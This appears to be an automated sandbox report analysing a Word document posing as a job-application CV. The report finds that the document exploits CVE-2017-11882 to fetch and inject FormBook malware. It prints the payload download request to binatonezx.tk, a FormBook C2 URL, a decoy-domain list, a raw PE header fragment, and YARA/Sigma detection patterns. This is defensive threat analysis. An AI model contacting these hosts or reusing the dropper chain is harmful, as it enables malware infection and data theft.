
Windows Analysis Report C.V_Job Request.doc

Overview

General Information

Sample Name: C.V_Job Request.doc
Analysis ID: 510259
MD5: b5be29921304476377e096c60a3fb418
SHA1: 653d40c3e86feb11b1cc6b7745257754c296c109
SHA256: fd4e52557f511c596e0d0ff58a1a7775a1295889461b73856d4aa733108e7b58
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 940 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • seasonhd72463.exe (PID: 1812 cmdline: C:\Users\user\AppData\Roaming\seasonhd72463.exe MD5: 9227463FFB6E37D271919E06D175EDA7)
      • seasonhd72463.exe (PID: 2820 cmdline: C:\Users\user\AppData\Roaming\seasonhd72463.exe MD5: 9227463FFB6E37D271919E06D175EDA7)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msiexec.exe (PID: 2004 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 2176 cmdline: /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(30 entries in total; remainder not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.seasonhd72463.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.seasonhd72463.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.seasonhd72463.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
5.0.seasonhd72463.exe.400000.9.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.seasonhd72463.exe.400000.9.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 entries in total; remainder not shown)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 2.56.59.211, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\seasonhd72463.exe, CommandLine: C:\Users\user\AppData\Roaming\seasonhd72463.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\seasonhd72463.exe, NewProcessName: C:\Users\user\AppData\Roaming\seasonhd72463.exe, OriginalFileName: C:\Users\user\AppData\Roaming\seasonhd72463.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: C:\Users\user\AppData\Roaming\seasonhd72463.exe, ProcessId: 1812

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (the extracted configuration is identical to the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: C.V_Job Request.doc; Virustotal: Detection: 50%
Yara detected FormBook
Source: Yara match; File source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://binatonezx.tk/seasonzx.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: binatonezx.tk; Virustotal: Detection: 15%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp; Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe; ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe; ReversingLabs: Detection: 22%
Source: 5.0.seasonhd72463.exe.400000.9.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.seasonhd72463.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.seasonhd72463.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.seasonhd72463.exe.400000.7.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: msiexec.pdb; source: seasonhd72463.exe, 00000005.00000002.461806357.0000000000380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb; source: seasonhd72463.exe, msiexec.exe
Source: global traffic; DNS query: name: binatonezx.tk
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe; Code function: 4x nop then jmp 005D1E35h (4_2_005D1C8E)
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe; Code function: 4x nop then pop esi (5_2_00417326)
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe; Code function: 4x nop then pop edi (5_2_00417DA8)
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then pop esi (7_2_00127326)
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then pop edi (7_2_00127DA8)
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.lenovoidc.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.agentpathleurre.space/s18y/
Source: Joe Sandbox View; ASN Name: GBTCLOUDUS
Source: Joe Sandbox View; IP Address: 2.56.59.211
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Wed, 27 Oct 2021 14:42:17 GMT; Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips; Last-Modified: Wed, 27 Oct 2021 07:19:00 GMT; ETag: "80800-5cf50687391d8"; Accept-Ranges: bytes; Content-Length: 526336; Vary: User-Agent; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload; Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 a4 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 07 00 00 08 00 00 00 00 00 00 3e 1d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 1c 08 00 4f 00 00 00 00 20 08 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 fd 07 00 00 20 00 00 00 fe 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 20 08 00 00 06 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 c4 be 00 00 03 00 00 00 74 01 00 06 d4 7c 01 00 18 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00
Source: global traffic; HTTP traffic detected: GET /seasonzx.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: binatonezx.tk; Connection: Keep-Alive
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
Source: seasonhd72463.exe, 00000004.00000002.423882111.0000000000814000.00000004.00000020.sdmp; String found in binary or memory: http://go.microsoft.c
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.509688161.0000000003E50000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp; String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.425477290.000000000031D000.00000004.00000020.sdmp; String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679548263.0000000001F70000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp; String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp; String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpT2P&
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp_2P&
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.510496452.000000000460B000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.449321006.0000000003DF8000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F12DB12-48BF-46DA-B084-D7B910635C9B}.tmp
Source: unknown; DNS traffic detected: queries for: binatonezx.tk
Source: global traffic; HTTP traffic detected: GET /seasonzx.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: binatonezx.tk; Connection: Keep-Alive

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
